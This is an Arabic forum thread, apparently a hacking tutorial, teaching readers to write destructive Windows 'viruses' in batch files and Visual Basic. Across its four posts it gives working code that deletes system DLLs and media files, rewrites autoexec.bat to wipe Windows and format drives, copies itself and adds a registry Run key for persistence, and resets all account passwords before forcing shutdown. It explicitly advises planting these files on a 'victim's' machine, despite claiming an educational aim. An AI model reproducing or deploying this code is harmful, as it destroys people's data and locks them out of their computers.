تعلم برمجة وصناعة الفيروسات وأختراق وتدمير الأجهزة

x32x01
  • بواسطة x32x01 ||
  • #1
الفيروس ده عبارة عن برنامج صغير جداً بيشتغل من نفسه من غير ما المستخدم يحس بيه. أحياناً بيشتغل عن طريق إنه يرتبط ببرنامج من برامج الويندوز.
في فيروسات بتشتغل فى وقت معين بناءاً على الساعة أو التاريخ بتاع الجهاز. أشهر واحد هو فيروس تشرنوبل (تشيرنوبل) اللي بيشتغل يوم 26 من كل شهر.
سمي فيروس عشان شبه الفيروسات الحقيقية اللي بتصيب جسم الإنسان وبتروح تتكاثر بسرعة وتخرب كل حاجة.

شروط لازم تتوفر عشان الفيروس يكون فعال ✅​

  • يكون حجمه صغير عشان محدش ياخد باله منه.
  • يعتمد على نفسه فى التشغيل أو يرتبط بملف من ملفات النظام.
  • يكون ليه هدف واضح (تخريب، سرقة بيانات، أو تعطيل جهاز).

تحذير خطير جداً قبل ما تبدأ ⚠️​

لو لسه بتتعلم أو بتخاف من التعامل مع الفيروسات، ياريت تكتفي بالفهم النظري بس ومتجربش حاجة على جهازك الشخصي. أي غلطة فى الكود ممكن تدمر نظام التشغيل بتاعك بالكامل. أنا مش مسؤول عن أي ضرر يحصل ليك لو جربت الكود من غير ما تكون فاهم.



طرق صناعة الفيروسات (إيه المتاح قدامك؟) 🛠️​

أنا لما دورت على النت لقيت 3 طرق رئيسية لعمل فيروسات:
  1. عن طريق المفكرة (Notepad) 📝
  2. عن طريق لغات البرمجة زي VB، C#، Python، C 💻
  3. عن طريق برامج جاهزة لصناعة الفيروسات (خطيرة جداً بس معظمها مكتشف من antivirus) 🦠
احنا فى البوست ده هنشرح الطريقة الأولى بالتفصيل.



ازاي تعمل فيروس بالمفكرة (Notepad) خطوة بخطوة 📓​

دي أسهل طريقة ومحتاجين بس نعرف ازاي نكتب الكود ونحفظه.
الخطوات:
  1. افتح Notepad (المفكرة).
  2. اكتب الكود اللي أنا هديهولك.
  3. احفظ الملف بـ اسم أي حاجة بس امتداده يكون .bat (مثلاً: virus.bat).
ملحوظة: بعد ما تحفظ، شكل الأيقونة هتتغير لشباك أزرق فيه عجلة صفراء. متفتحش الملف إلا لو عايز تخرب جهازك أو جربه على جهاز تجارب (Virtual Machine).



أول كود فيروس (مسح ملفات النظام) 💀​


Code:
@Echo off
c:
cd %WinDir%\System\
deltree /y *.dll
cd\
deltree /y *.y

شرح الكود 🧠​

  • @Echo off: بيخفي الأوامر عن المستخدم عشان منظر احترافي.
  • c:: بيروح على قرص C (القرص الأساسي).
  • cd %WinDir%\System\: بيروح لمكان ملفات النظام بتاعة الويندوز.
  • deltree /y *.dll: بيأمر الجهاز إنه يمسح كل الملفات اللي امتدادها .dll من غير ما يسأل (/y).
  • deltree /y *.sys: بيروح يمسح كل ملفات .sys (ملفات النظام).
النتيجة: الجهاز مش هيقدر يشتغل تاني خالص.

ازاي تعدل الكود بنفسك؟ 🔧​

تقدر تغير حاجتين:
  1. نوع الملفات اللي هتتمسح (زي .jpg أو .mp3 أو .exe).
  2. مكان الفيروس (القرص اللي هيشتغل عليه زي D: أو E🙂.



مثال عملي: فيروس يمسح الصور والأغاني والأفلام من قرص E: 🎬​


Code:
@Echo off
e:
deltree /y *.jpg
cd\
deltree /y *.mp3
cd\
deltree /y *.asf
لو حطيت الكود ده، أي جهاز عليه قرص E: وبه صور أو أغاني أو أفلام بالامتدادات دي، كلهم هيتشالو في ثواني.



نصائح مهمة قبل ما تكتب أي كود 🧼​

  • متجربش على جهازك الأساسي أبداً.
  • لو عايز تتعلم، استخدم برنامج VirtualBox أو جهاز قديم مش مهم.
  • أغلب برامج الحماية (Antivirus) هتتكشف الفيروسات دي علطول لأنها معروفة.
  • الغرض من المقال هو التعليم والفهم، مش التخريب.



الخلاصة (كلمة أخيرة) 🎯​

صناعة الفيروسات مش صعبة، لكنها خطيرة جداً. لو فهمت إزاى الفيروس بيشتغل، هتقدر تحمي نفسك منه أحسن. أهم حاجة إنك متبقاش الشخص اللي بيستخدم العلم ده فى أذى الناس.
يتبع ...
 
  • بواسطة x32x01 ||
  • #2
Code:
echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
الـتوضــــيح :
الفيروس السابق يعتبر من الأفكار الجيدة للزين هما من محبين فى البرمجة وافهمين فى فكرة عمل لكمبيوتر و ليس ممن هم من هواة تعلم برنامج صغير ثم يقول عى نفسه خبير كمبيوتر
نبدا بتوضيح الكود :
فكما نرى فى الكود اول سطر مجرد فائدته مسح الشاشة من اى امر او تعليق مسبق حتى يجعل عمل هذا الفيروس هو الوحيد
بعد سوف نجد مجموعة من السطور هى تقريبا مكرره فكرتها وليس مكرر عملها ولاكن يمكننا ان نوضح انه هناك 3 اكود منفصله هم الفكرة الأسايه و هما ما سوف نحن نوضحه
Code:
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
يعطى هذا المود الأمر للكمبيوتر بمسح الفولدر program files والذى يوجد فيه جميع البرامج التى تنزل على الجهاز و نلاحظ تكراره فى مسح الويندوز فى الكود
Code:
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
ولاكنه اذا قام بمسح الويندوز فهو لن يستطيع عمل فورمات بعد ذلك لذا فقبل ذلك اعطى امر نسخ لهذان الأمرن حتى يمكننا استخدامهم فيما بعد و هذا هو ما اعطاه هذان السطرين
Code:
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
اما بعد ذلك فهو اعطاه الأمر بعمل فورمات للجهاز و هذا كما هو موجود فى السطر التالى
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
اولا يوجد بعض الامور توضيحها قبل البدأ فى هذا الموضوع وهو انه بوضع هذا الفيروس فى الـC:
سوف يجعله يعمل تلقائيا عند فتح الجهاز لذا لا تحفظه فى هذا partion اما اذا كنت تسوى تهكرعلى جهاز فقم تحميل هذا الفيروس الى الـC: عنده ثم دعه يتمتع بذلك بعد ان يفتح جهازه
ولاكنى وجدت فيه عيب بسيط و هو ان هذا الفيروس لن يعمل فى جهاز وضع فيه الويندو داخل فولدر غير windows فمثلا اذا كان هناك ضحيه يوجد عندها ويندوز موضوع داخل فولدر win98 فان الفيروس الذى كوناه لن يقوم ببعض الأعمال و هى نسخ الأوامر و مسح الويندوز ولاكنه سوف يقوم بعمل فورمات
اما بالنسبة لتعديله فكل ما استطيع ان اعطيكم اياه من تدعديل مفيد فيه و هو انكم تمسحوا اوامر مسح الويندوز و Program files و تدع امر الفورمات مع تغير مثلا انه يسوى فورما على الـ D: فيكون لكود كما يلى
Code:
echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo format d: /q /u /autotest >nul >>c:\autoexec.bat
 
  • بواسطة x32x01 ||
  • #3
Code:
echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
يعتبر هذا الفيروس نفس عمل السابق لذا انا لست بحاجه الى توضيحه او اخباركم بما انتم يجب ان تقومو به حتى تعدلوه
كل ما انا يجب ان اقوله لكم بخصوص هذا الكود انه يجب عليكم ان تسمه بـ Autoexec.bat

الأن و بعد ان تعرفنا الى الأكواد السابقة ما رأيكم فى جعل هذا الفيروس اقوى بان نضيف اليه بعض الخصائص و سوف اوضح اكواده
الخاصـــية الأولى :-
Code:
On Error Resume Next
Dim copy, copy2
copy = "c:\virus.exe"
copy2 = "c:\windows\system\Project12.exe"
FileCopy copy, copy2
يعطى هذا الكود للفيروس خاصية نسخ نفسه الى مكان اخر حتى لا يمكن للضحيه ايقافه بمجرد مسحه و يمكننا من التعامل مع الكود بكل بساطة هذا اذا كنت من الفاهمين للكمبيوتر بدرجة جيدة و ليس للبرامج الصغيرة التى تاتى معه
الخاصــــــــــــــية الثانيه :-
Code:
Option Explicit
Private Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As String, lpcbData As Long) As Long
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long
Private Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long
Private Const REG_SZ = 1
Private Const LOCALMACHINE = &H80000002
Private Sub Command1_Click()
Dim InputValue As String
Dim nBufferKey As Long, nBufferSubKey As Long
RegCreateKey LOCALMACHINE, "SOFTWARE\JPRODUCTIONS", nBufferKey
RegOpenKey LOCALMACHINE, "Software\Microsoft\Windows\CurrentVersion", nBufferKey
RegOpenKey nBufferKey, "Run-", nBufferSubKey
InputValue = "c:\windows\system\Project12.exe"
RegOpenKey LOCALMACHINE, "Software\Microsoft\Windows\CurrentVersion", nBufferKey
RegOpenKey nBufferKey, "Run-", nBufferSubKey
RegSetValueEx nBufferSubKey, "My virus", 0, REG_SZ, InputValue, Len(InputValue)
End Sub
يعطى هذا الكود للفيروس خاصية انه يمكنه من ان يشتغل تلقائيا عند فتح الجهاز و هذا عن طريق تعديل ال registry
 
  • بواسطة x32x01 ||
  • #4
برمجة فيرس لأغلاق جهاز الضحية ووضع لة كلمة مرور .. لا يستطيع فتح الجهاز بعدها
الا بعد أدخال كلمة المرور ( لا تستخدمه مع أصدقائك )
تابع معايا الكود ده
Code:
echo off@
break off
net user%USERNAME%123456
net user administrator 123456
net user Guest 123456
shutdown -s -f -t 0
exit
وأبعته للضحية
( ليس للأبداع حدود )
ممكن تعمل أى حاجة تخطر على ذهنك بالأكواد​
 
مواضيع مشابهة
x32x01
الردود
0
المشاهدات
14
x32x01
x32x01
x32x01
الردود
2
المشاهدات
31
x32x01
x32x01
x32x01
الردود
0
المشاهدات
15
x32x01
x32x01
x32x01
الردود
0
المشاهدات
17
x32x01
x32x01
إحصائيات المنتدى
المواضيع
1,594
المشاركات
1,645
الأعضاء
13
آخر عضو مسجل
Mostafa
عودة
أعلى